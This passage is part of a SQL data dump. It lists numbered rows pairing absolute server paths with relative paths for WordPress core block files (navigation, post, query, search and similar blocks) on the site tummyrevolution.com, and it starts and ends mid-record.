ome/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/block.json','wp-includes/blocks/navigation-link/block.json'),(14881,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/editor-rtl.css','wp-includes/blocks/navigation-link/editor-rtl.css'),(14882,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/editor-rtl.min.css','wp-includes/blocks/navigation-link/editor-rtl.min.css'),(14883,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/editor.css','wp-includes/blocks/navigation-link/editor.css'),(14884,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/editor.min.css','wp-includes/blocks/navigation-link/editor.min.css'),(14885,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/style-rtl.css','wp-includes/blocks/navigation-link/style-rtl.css'),(14886,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/style-rtl.min.css','wp-includes/blocks/navigation-link/style-rtl.min.css'),(14887,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/style.css','wp-includes/blocks/navigation-link/style.css'),(14888,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/style.min.css','wp-includes/blocks/navigation-link/style.min.css'),(14889,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link.php','wp-includes/blocks/navigation-link.php'),(14890,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-submenu/block.json','wp-includes/blocks/navigation-submenu/block.json'),(14891,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-submenu/editor-rtl.css','wp-includes/blocks/navigation-submenu/editor-rtl.css'),(14892,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-submenu/editor-rtl.min.css','wp-includes/blocks/navigation-submenu/editor-rtl.min.css'),(14893,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-submenu/editor.css','wp-includes/blocks/navigation-submenu/editor.css'),(14894,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-submenu/editor.min.css','wp-includes/blocks/navigation-submenu/editor.min.css'),(14895,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-submenu.php','wp-includes/blocks/navigation-submenu.php'),(14896,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation.php','wp-includes/blocks/navigation.php'),(14897,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/nextpage/block.json','wp-includes/blocks/nextpage/block.json'),(14898,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/nextpage/editor-rtl.css','wp-includes/blocks/nextpage/editor-rtl.css'),(14899,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/nextpage/editor-rtl.min.css','wp-includes/blocks/nextpage/editor-rtl.min.css'),(14900,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/nextpage/editor.css','wp-includes/blocks/nextpage/editor.css'),(14901,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/nextpage/editor.min.css','wp-includes/blocks/nextpage/editor.min.css'),(14902,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/block.json','wp-includes/blocks/page-list/block.json'),(14903,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/editor-rtl.css','wp-includes/blocks/page-list/editor-rtl.css'),(14904,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/editor-rtl.min.css','wp-includes/blocks/page-list/editor-rtl.min.css'),(14905,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/editor.css','wp-includes/blocks/page-list/editor.css'),(14906,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/editor.min.css','wp-includes/blocks/page-list/editor.min.css'),(14907,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/style-rtl.css','wp-includes/blocks/page-list/style-rtl.css'),(14908,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/style-rtl.min.css','wp-includes/blocks/page-list/style-rtl.min.css'),(14909,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/style.css','wp-includes/blocks/page-list/style.css'),(14910,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/style.min.css','wp-includes/blocks/page-list/style.min.css'),(14911,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list-item/block.json','wp-includes/blocks/page-list-item/block.json'),(14912,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list-item.php','wp-includes/blocks/page-list-item.php'),(14913,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list.php','wp-includes/blocks/page-list.php'),(14914,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/block.json','wp-includes/blocks/paragraph/block.json'),(14915,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/editor-rtl.css','wp-includes/blocks/paragraph/editor-rtl.css'),(14916,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/editor-rtl.min.css','wp-includes/blocks/paragraph/editor-rtl.min.css'),(14917,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/editor.css','wp-includes/blocks/paragraph/editor.css'),(14918,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/editor.min.css','wp-includes/blocks/paragraph/editor.min.css'),(14919,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/style-rtl.css','wp-includes/blocks/paragraph/style-rtl.css'),(14920,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/style-rtl.min.css','wp-includes/blocks/paragraph/style-rtl.min.css'),(14921,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/style.css','wp-includes/blocks/paragraph/style.css'),(14922,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/style.min.css','wp-includes/blocks/paragraph/style.min.css'),(14923,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pattern/block.json','wp-includes/blocks/pattern/block.json'),(14924,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pattern.php','wp-includes/blocks/pattern.php'),(14925,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-author/block.json','wp-includes/blocks/post-author/block.json'),(14926,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-author/style-rtl.css','wp-includes/blocks/post-author/style-rtl.css'),(14927,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-author/style-rtl.min.css','wp-includes/blocks/post-author/style-rtl.min.css'),(14928,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-author/style.css','wp-includes/blocks/post-author/style.css'),(14929,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-author/style.min.css','wp-includes/blocks/post-author/style.min.css'),(14930,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-author-biography/block.json','wp-includes/blocks/post-author-biography/block.json'),(14931,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-author-biography.php','wp-includes/blocks/post-author-biography.php'),(14932,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-author-name/block.json','wp-includes/blocks/post-author-name/block.json'),(14933,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-author-name.php','wp-includes/blocks/post-author-name.php'),(14934,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-author.php','wp-includes/blocks/post-author.php'),(14935,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-comments-form/block.json','wp-includes/blocks/post-comments-form/block.json'),(14936,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-comments-form/editor-rtl.css','wp-includes/blocks/post-comments-form/editor-rtl.css'),(14937,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-comments-form/editor-rtl.min.css','wp-includes/blocks/post-comments-form/editor-rtl.min.css'),(14938,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-comments-form/editor.css','wp-includes/blocks/post-comments-form/editor.css'),(14939,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-comments-form/editor.min.css','wp-includes/blocks/post-comments-form/editor.min.css'),(14940,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-comments-form/style-rtl.css','wp-includes/blocks/post-comments-form/style-rtl.css'),(14941,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-comments-form/style-rtl.min.css','wp-includes/blocks/post-comments-form/style-rtl.min.css'),(14942,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-comments-form/style.css','wp-includes/blocks/post-comments-form/style.css'),(14943,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-comments-form/style.min.css','wp-includes/blocks/post-comments-form/style.min.css'),(14944,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-comments-form.php','wp-includes/blocks/post-comments-form.php'),(14945,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-content/block.json','wp-includes/blocks/post-content/block.json'),(14946,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-content.php','wp-includes/blocks/post-content.php'),(14947,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-date/block.json','wp-includes/blocks/post-date/block.json'),(14948,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-date/style-rtl.css','wp-includes/blocks/post-date/style-rtl.css'),(14949,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-date/style-rtl.min.css','wp-includes/blocks/post-date/style-rtl.min.css'),(14950,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-date/style.css','wp-includes/blocks/post-date/style.css'),(14951,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-date/style.min.css','wp-includes/blocks/post-date/style.min.css'),(14952,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-date.php','wp-includes/blocks/post-date.php'),(14953,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-excerpt/block.json','wp-includes/blocks/post-excerpt/block.json'),(14954,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-excerpt/editor-rtl.css','wp-includes/blocks/post-excerpt/editor-rtl.css'),(14955,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-excerpt/editor-rtl.min.css','wp-includes/blocks/post-excerpt/editor-rtl.min.css'),(14956,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-excerpt/editor.css','wp-includes/blocks/post-excerpt/editor.css'),(14957,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-excerpt/editor.min.css','wp-includes/blocks/post-excerpt/editor.min.css'),(14958,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-excerpt/style-rtl.css','wp-includes/blocks/post-excerpt/style-rtl.css'),(14959,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-excerpt/style-rtl.min.css','wp-includes/blocks/post-excerpt/style-rtl.min.css'),(14960,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-excerpt/style.css','wp-includes/blocks/post-excerpt/style.css'),(14961,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-excerpt/style.min.css','wp-includes/blocks/post-excerpt/style.min.css'),(14962,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-excerpt.php','wp-includes/blocks/post-excerpt.php'),(14963,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/block.json','wp-includes/blocks/post-featured-image/block.json'),(14964,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/editor-rtl.css','wp-includes/blocks/post-featured-image/editor-rtl.css'),(14965,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/editor-rtl.min.css','wp-includes/blocks/post-featured-image/editor-rtl.min.css'),(14966,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/editor.css','wp-includes/blocks/post-featured-image/editor.css'),(14967,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/editor.min.css','wp-includes/blocks/post-featured-image/editor.min.css'),(14968,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/style-rtl.css','wp-includes/blocks/post-featured-image/style-rtl.css'),(14969,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/style-rtl.min.css','wp-includes/blocks/post-featured-image/style-rtl.min.css'),(14970,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/style.css','wp-includes/blocks/post-featured-image/style.css'),(14971,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/style.min.css','wp-includes/blocks/post-featured-image/style.min.css'),(14972,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image.php','wp-includes/blocks/post-featured-image.php'),(14973,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-navigation-link/block.json','wp-includes/blocks/post-navigation-link/block.json'),(14974,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-navigation-link/style-rtl.css','wp-includes/blocks/post-navigation-link/style-rtl.css'),(14975,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-navigation-link/style-rtl.min.css','wp-includes/blocks/post-navigation-link/style-rtl.min.css'),(14976,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-navigation-link/style.css','wp-includes/blocks/post-navigation-link/style.css'),(14977,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-navigation-link/style.min.css','wp-includes/blocks/post-navigation-link/style.min.css'),(14978,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-navigation-link.php','wp-includes/blocks/post-navigation-link.php'),(14979,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-template/block.json','wp-includes/blocks/post-template/block.json'),(14980,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-template/editor-rtl.css','wp-includes/blocks/post-template/editor-rtl.css'),(14981,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-template/editor-rtl.min.css','wp-includes/blocks/post-template/editor-rtl.min.css'),(14982,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-template/editor.css','wp-includes/blocks/post-template/editor.css'),(14983,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-template/editor.min.css','wp-includes/blocks/post-template/editor.min.css'),(14984,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-template/style-rtl.css','wp-includes/blocks/post-template/style-rtl.css'),(14985,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-template/style-rtl.min.css','wp-includes/blocks/post-template/style-rtl.min.css'),(14986,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-template/style.css','wp-includes/blocks/post-template/style.css'),(14987,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-template/style.min.css','wp-includes/blocks/post-template/style.min.css'),(14988,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-template.php','wp-includes/blocks/post-template.php'),(14989,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-terms/block.json','wp-includes/blocks/post-terms/block.json'),(14990,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-terms/style-rtl.css','wp-includes/blocks/post-terms/style-rtl.css'),(14991,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-terms/style-rtl.min.css','wp-includes/blocks/post-terms/style-rtl.min.css'),(14992,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-terms/style.css','wp-includes/blocks/post-terms/style.css'),(14993,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-terms/style.min.css','wp-includes/blocks/post-terms/style.min.css'),(14994,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-terms.php','wp-includes/blocks/post-terms.php'),(14995,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-title/block.json','wp-includes/blocks/post-title/block.json'),(14996,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-title/style-rtl.css','wp-includes/blocks/post-title/style-rtl.css'),(14997,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-title/style-rtl.min.css','wp-includes/blocks/post-title/style-rtl.min.css'),(14998,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-title/style.css','wp-includes/blocks/post-title/style.css'),(14999,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-title/style.min.css','wp-includes/blocks/post-title/style.min.css'),(15000,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-title.php','wp-includes/blocks/post-title.php'),(15001,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/preformatted/block.json','wp-includes/blocks/preformatted/block.json'),(15002,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/preformatted/style-rtl.css','wp-includes/blocks/preformatted/style-rtl.css'),(15003,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/preformatted/style-rtl.min.css','wp-includes/blocks/preformatted/style-rtl.min.css'),(15004,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/preformatted/style.css','wp-includes/blocks/preformatted/style.css'),(15005,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/preformatted/style.min.css','wp-includes/blocks/preformatted/style.min.css'),(15006,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/block.json','wp-includes/blocks/pullquote/block.json'),(15007,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/editor-rtl.css','wp-includes/blocks/pullquote/editor-rtl.css'),(15008,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/editor-rtl.min.css','wp-includes/blocks/pullquote/editor-rtl.min.css'),(15009,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/editor.css','wp-includes/blocks/pullquote/editor.css'),(15010,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/editor.min.css','wp-includes/blocks/pullquote/editor.min.css'),(15011,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/style-rtl.css','wp-includes/blocks/pullquote/style-rtl.css'),(15012,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/style-rtl.min.css','wp-includes/blocks/pullquote/style-rtl.min.css'),(15013,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/style.css','wp-includes/blocks/pullquote/style.css'),(15014,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/style.min.css','wp-includes/blocks/pullquote/style.min.css'),(15015,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/theme-rtl.css','wp-includes/blocks/pullquote/theme-rtl.css'),(15016,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/theme-rtl.min.css','wp-includes/blocks/pullquote/theme-rtl.min.css'),(15017,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/theme.css','wp-includes/blocks/pullquote/theme.css'),(15018,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/theme.min.css','wp-includes/blocks/pullquote/theme.min.css'),(15019,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/block.json','wp-includes/blocks/query/block.json'),(15020,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/editor-rtl.css','wp-includes/blocks/query/editor-rtl.css'),(15021,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/editor-rtl.min.css','wp-includes/blocks/query/editor-rtl.min.css'),(15022,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/editor.css','wp-includes/blocks/query/editor.css'),(15023,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/editor.min.css','wp-includes/blocks/query/editor.min.css'),(15024,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/style-rtl.css','wp-includes/blocks/query/style-rtl.css'),(15025,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/style-rtl.min.css','wp-includes/blocks/query/style-rtl.min.css'),(15026,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/style.css','wp-includes/blocks/query/style.css'),(15027,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/style.min.css','wp-includes/blocks/query/style.min.css'),(15028,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/view.asset.php','wp-includes/blocks/query/view.asset.php'),(15029,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/view.js','wp-includes/blocks/query/view.js'),(15030,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/view.min.asset.php','wp-includes/blocks/query/view.min.asset.php'),(15031,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/view.min.js','wp-includes/blocks/query/view.min.js'),(15032,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-no-results/block.json','wp-includes/blocks/query-no-results/block.json'),(15033,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-no-results.php','wp-includes/blocks/query-no-results.php'),(15034,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/block.json','wp-includes/blocks/query-pagination/block.json'),(15035,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/editor-rtl.css','wp-includes/blocks/query-pagination/editor-rtl.css'),(15036,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/editor-rtl.min.css','wp-includes/blocks/query-pagination/editor-rtl.min.css'),(15037,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/editor.css','wp-includes/blocks/query-pagination/editor.css'),(15038,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/editor.min.css','wp-includes/blocks/query-pagination/editor.min.css'),(15039,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/style-rtl.css','wp-includes/blocks/query-pagination/style-rtl.css'),(15040,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/style-rtl.min.css','wp-includes/blocks/query-pagination/style-rtl.min.css'),(15041,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/style.css','wp-includes/blocks/query-pagination/style.css'),(15042,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/style.min.css','wp-includes/blocks/query-pagination/style.min.css'),(15043,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-next/block.json','wp-includes/blocks/query-pagination-next/block.json'),(15044,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-next.php','wp-includes/blocks/query-pagination-next.php'),(15045,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-numbers/block.json','wp-includes/blocks/query-pagination-numbers/block.json'),(15046,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-numbers/editor-rtl.css','wp-includes/blocks/query-pagination-numbers/editor-rtl.css'),(15047,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-numbers/editor-rtl.min.css','wp-includes/blocks/query-pagination-numbers/editor-rtl.min.css'),(15048,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-numbers/editor.css','wp-includes/blocks/query-pagination-numbers/editor.css'),(15049,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-numbers/editor.min.css','wp-includes/blocks/query-pagination-numbers/editor.min.css'),(15050,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-numbers.php','wp-includes/blocks/query-pagination-numbers.php'),(15051,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-previous/block.json','wp-includes/blocks/query-pagination-previous/block.json'),(15052,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-previous.php','wp-includes/blocks/query-pagination-previous.php'),(15053,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination.php','wp-includes/blocks/query-pagination.php'),(15054,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-title/block.json','wp-includes/blocks/query-title/block.json'),(15055,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-title/style-rtl.css','wp-includes/blocks/query-title/style-rtl.css'),(15056,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-title/style-rtl.min.css','wp-includes/blocks/query-title/style-rtl.min.css'),(15057,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-title/style.css','wp-includes/blocks/query-title/style.css'),(15058,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-title/style.min.css','wp-includes/blocks/query-title/style.min.css'),(15059,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-title.php','wp-includes/blocks/query-title.php'),(15060,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query.php','wp-includes/blocks/query.php'),(15061,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/block.json','wp-includes/blocks/quote/block.json'),(15062,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/style-rtl.css','wp-includes/blocks/quote/style-rtl.css'),(15063,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/style-rtl.min.css','wp-includes/blocks/quote/style-rtl.min.css'),(15064,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/style.css','wp-includes/blocks/quote/style.css'),(15065,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/style.min.css','wp-includes/blocks/quote/style.min.css'),(15066,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/theme-rtl.css','wp-includes/blocks/quote/theme-rtl.css'),(15067,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/theme-rtl.min.css','wp-includes/blocks/quote/theme-rtl.min.css'),(15068,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/theme.css','wp-includes/blocks/quote/theme.css'),(15069,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/theme.min.css','wp-includes/blocks/quote/theme.min.css'),(15070,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/read-more/block.json','wp-includes/blocks/read-more/block.json'),(15071,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/read-more/style-rtl.css','wp-includes/blocks/read-more/style-rtl.css'),(15072,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/read-more/style-rtl.min.css','wp-includes/blocks/read-more/style-rtl.min.css'),(15073,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/read-more/style.css','wp-includes/blocks/read-more/style.css'),(15074,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/read-more/style.min.css','wp-includes/blocks/read-more/style.min.css'),(15075,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/read-more.php','wp-includes/blocks/read-more.php'),(15076,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/require-dynamic-blocks.php','wp-includes/blocks/require-dynamic-blocks.php'),(15077,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/require-static-blocks.php','wp-includes/blocks/require-static-blocks.php'),(15078,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/block.json','wp-includes/blocks/rss/block.json'),(15079,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/editor-rtl.css','wp-includes/blocks/rss/editor-rtl.css'),(15080,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/editor-rtl.min.css','wp-includes/blocks/rss/editor-rtl.min.css'),(15081,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/editor.css','wp-includes/blocks/rss/editor.css'),(15082,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/editor.min.css','wp-includes/blocks/rss/editor.min.css'),(15083,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/style-rtl.css','wp-includes/blocks/rss/style-rtl.css'),(15084,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/style-rtl.min.css','wp-includes/blocks/rss/style-rtl.min.css'),(15085,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/style.css','wp-includes/blocks/rss/style.css'),(15086,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/style.min.css','wp-includes/blocks/rss/style.min.css'),(15087,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss.php','wp-includes/blocks/rss.php'),(15088,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/block.json','wp-includes/blocks/search/block.json'),(15089,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/editor-rtl.css','wp-includes/blocks/search/editor-rtl.css'),(15090,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/editor-rtl.min.css','wp-includes/blocks/search/editor-rtl.min.css'),(15091,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/editor.css','wp-includes/blocks/search/editor.css'),(15092,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/editor.min.css','wp-includes/blocks/search/editor.min.css'),(15093,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/style-rtl.css','wp-includes/blocks/search/style-rtl.css'),(15094,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/style-rtl.min.css','wp-includes/blocks/search/style-rtl.min.css'),(15095,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/style.css','wp-includes/blocks/search/style.css'),(15096,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/style.min.css','wp-includes/blocks/search/style.min.css'),(15097,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/theme-rtl.css','wp-includes/blocks/search/theme-rtl.css'),(15098,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/theme-rtl.min.css','wp-includes/blocks/search/theme-rtl.min.css'),(15099,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/theme.css','wp-includes/blocks/search/theme.css'),(15100,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/theme.min.css','wp-includes/blocks/search/theme.min.css'),(15101,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/view.asset.php','wp-includes/blocks/search/view.asset.php'),(15102,'/home/tummmyov/tummyrevolution.com/w